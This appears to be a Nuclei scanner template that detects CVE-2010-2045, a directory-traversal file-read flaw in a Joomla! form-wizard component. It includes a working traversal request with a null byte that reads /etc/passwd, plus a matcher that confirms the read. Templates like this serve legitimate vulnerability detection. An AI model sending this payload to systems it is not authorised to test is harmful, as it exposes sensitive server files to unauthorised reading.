44 lines
1.8 KiB
YAML
44 lines
1.8 KiB
YAML
id: CVE-2010-2045
|
|
|
|
info:
|
|
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12595
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-2045
|
|
- http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58574
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2010-2045
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01671
|
|
epss-percentile: 0.86287
|
|
cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: dionesoft
|
|
product: com_dioneformwizard
|
|
tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ca00fa1c2e8785e665cbf491b2e108f921561c2dd2e87039ef156d77c44f40e5022100daf8e4b14c228b30e2c641a0c6af878823e71701c4282339b11d1f50b27f3795:922c64590222798bb761d5b6d8e72950 |